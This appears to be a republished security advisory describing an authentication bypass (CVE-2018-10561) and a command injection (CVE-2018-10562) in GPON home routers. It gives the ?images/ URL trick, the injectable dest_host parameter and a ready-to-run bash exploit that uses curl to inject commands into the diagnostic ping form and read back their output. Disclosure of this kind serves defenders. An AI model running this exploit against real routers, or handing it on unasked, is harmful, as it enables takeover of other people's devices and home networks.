GPON Routers – Authentication Bypass / Command Injection

Authors:vpnmentor           Risk:High

CVE:CVE-2018-10561         0day:Authentication Bypass

CVE:CVE-2018-10562         0day:Command Injection 

0day -id:0DAY-176142        Date:2018-05-07

Overview:

We conducted a comprehensive assessment on a number of GPON home routers. Many routers today use GPON internet, and we found a way to bypass all authentication on the devices (CVE-2018-10561). With this authentication bypass, we were also able to unveil another command injection vulnerability (CVE-2018-10562) and execute commands on the device

Exploitation:

During our analysis of GPON firmwares, we found two different critical vulnerabilities (CVE-2018-10561 & CVE-2018-10562)  that could, when combined allow complete control on the device and therefore the network. The first vulnerability exploits the authentication mechanism of the device that has a flaw. This flaw allows any attacker to bypass all authentication.

The flaw can be found with the HTTP servers, which check for specific paths when authenticating. This allows the attacker to bypass authentication on any endpoint using a simple trick.

By appending ?images/ to the URL, the attacker can bypass the endpoint.

This works on both HTML pages and GponForm/

For instance, by inserting

/menu.html?images/
or
/GponForm/diag_FORM?images/

we can manage the device.

While looking through the device functionalities, we noticed the diagnostic endpoint contained the ping and traceroute commands. It didn’t take much to figure out that the commands can be injected by the host parameter.

Since the router saves ping results in /tmp and transmits it to the user when the user revisits /diag.html, it’s quite simple to execute commands and retrieve their output with the authentication bypass vulnerability.

We include the following bash version of the exploit code:

#!/bin/bash

echo “[+] Sending the Command… “
# We send the commands with two modes backtick (`) and semicolon (;) because different models trigger on different devices
curl -k -d “XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=\`$2\`;$2&ipv=0” $1/GponForm/diag_Form?images/ 2>/dev/null 1>/dev/null
echo “[+] Waiting….”
sleep 3
echo “[+] Retrieving the ouput….”
curl -k $1/diag.html?images/ 2>/dev/null | grep ‘diag_result = ‘ | sed -e ‘s/\\n/\n/g’

Video demonstration

Impact:

GPON is a type of passive optical network that uses fiber-optics and is particularly popular. When people use GPON, the routers are provided by ISPs. In the video, you can see that over one million people use this type of network system router.

We tested this vulnerability on many random GPON routers, and the vulnerability was found on all of them. Because so many people use these types of routers, this vulnerability can result in an entire network compromise.

Recommendations:

  1. Check if your router uses the GPON network.
  2. Be aware that GPON routers can be hacked and exploited.
  3. Talk to your ISP to see what they can do to fix the bug.
  4. Warn your friends on Facebook (click here to share) and Twitter (click here to tweet).

Leave a Reply